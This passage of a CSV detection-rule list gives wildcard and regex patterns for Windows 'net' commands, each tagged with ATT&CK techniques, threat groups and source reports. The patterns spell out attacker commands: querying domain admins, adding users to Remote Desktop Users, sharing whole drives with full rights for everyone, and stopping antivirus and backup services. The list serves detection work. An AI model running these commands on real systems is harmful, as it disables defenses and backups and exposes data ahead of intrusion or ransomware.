BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group *Server Operators* /domain*",".{0,1000}net\sgroup\s.{0,1000}Server\sOperators.{0,1000}\s\/domain.{0,1000}","greyware_tool_keyword","net","display all domain names on the network","T1016 - T1046","TA0007 - TA0009","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A" "*net group /domain *Domain Admins*",".{0,1000}net\sgroup\s\/domain\s.{0,1000}Domain\sAdmins.{0,1000}","greyware_tool_keyword","net","Query users from domain admins in current domain","T1069.002 - T1087.002","TA0007 - TA0006","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*net group administrators /domain*",".{0,1000}net\sgroup\sadministrators\s\/domain.{0,1000}","greyware_tool_keyword","net","showing users in a privileged group. 
","T1069 - T1003","TA0007 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*net localgroup ""Remote Desktop Users"" * /add*",".{0,1000}net\slocalgroup\s\""Remote\sDesktop\sUsers\""\s.{0,1000}\s\/add.{0,1000}","greyware_tool_keyword","net","Adds a user account to the local Remote Desktop Users group","T1035 - T1078 - T1087","TA0003 ","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Persistence","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net localgroup *Backup Operators*",".{0,1000}net\slocalgroup\s.{0,1000}Backup\sOperators.{0,1000}","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net localgroup admin*",".{0,1000}net\slocalgroup\sadmin.{0,1000}","greyware_tool_keyword","net","discover local admins group","T1069.001 - T1087.002","TA0007 - TA0004","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat 
Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Discovery","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net share c=c:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sc\=c\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net share d=d:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sd\=d\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net share e=e:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\se\=e\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders 
for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net share e=e:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\se\=e\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net share f=f:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sf\=f\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral 
Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net share g=g:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sg\=g\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net share h=h:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sh\=h\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net share i=i:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\si\=i\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat 
Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net share j=j:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sj\=j\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net share k=k:\ /GRANT:Everyone,FULL*",".{0,1000}net\sshare\sk\=k\:\\\s\/GRANT\:Everyone,FULL.{0,1000}","greyware_tool_keyword","net","create shared folders for various drive letters","T1105 - T1543","TA0003 - TA0008 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Lateral Movement","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop ""IBM Domino Diagnostics 
(CProgramFilesIBMDomino)""*",".{0,1000}net\sstop\s\""IBM\sDomino\sDiagnostics\s\(CProgramFilesIBMDomino\)\"".{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop ""IBM Domino Server (CProgramFilesIBMDominodata)""*",".{0,1000}net\sstop\s\""IBM\sDomino\sServer\s\(CProgramFilesIBMDominodata\)\"".{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop ""Simply Accounting Database Connection Manager""*",".{0,1000}net\sstop\s\""Simply\sAccounting\sDatabase\sConnection\sManager\"".{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - 
BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop ""Sophos *",".{0,1000}net\sstop\s\""Sophos\s.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop ""SQL Backups""*",".{0,1000}net\sstop\s\""SQL\sBackups\"".{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop ""SQLsafe Backup Service""*",".{0,1000}net\sstop\s\""SQLsafe\sBackup\sService\"".{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - 
menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop ""storagecraft imagemanager*""",".{0,1000}net\sstop\s\""storagecraft\simagemanager.{0,1000}\""","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop ""Symantec System Recovery""*",".{0,1000}net\sstop\s\""Symantec\sSystem\sRecovery\"".{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net 
stop ""Veeam Backup Catalog Data Service""*",".{0,1000}net\sstop\s\""Veeam\sBackup\sCatalog\sData\sService\"".{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop ""Zoolz 2 Service""*",".{0,1000}net\sstop\s\""Zoolz\s2\sService\"".{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop acronisagent*",".{0,1000}net\sstop\sacronisagent.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team 
- APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop AcronisAgent*",".{0,1000}net\sstop\sAcronisAgent.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop acrsch2svc*",".{0,1000}net\sstop\sacrsch2svc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop AcrSch2Svc*",".{0,1000}net\sstop\sAcrSch2Svc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig 
- Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop agntsvc*",".{0,1000}net\sstop\sagntsvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop Antivirus*",".{0,1000}net\sstop\sAntivirus.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop ARSM 
/y*",".{0,1000}net\sstop\sARSM\s\/y.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop arsm*",".{0,1000}net\sstop\sarsm.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop AVP*",".{0,1000}net\sstop\sAVP.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop backp*",".{0,1000}net\sstop\sbackp.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop backup*",".{0,1000}net\sstop\sbackup.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop BackupExec*",".{0,1000}net\sstop\sBackupExec.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - 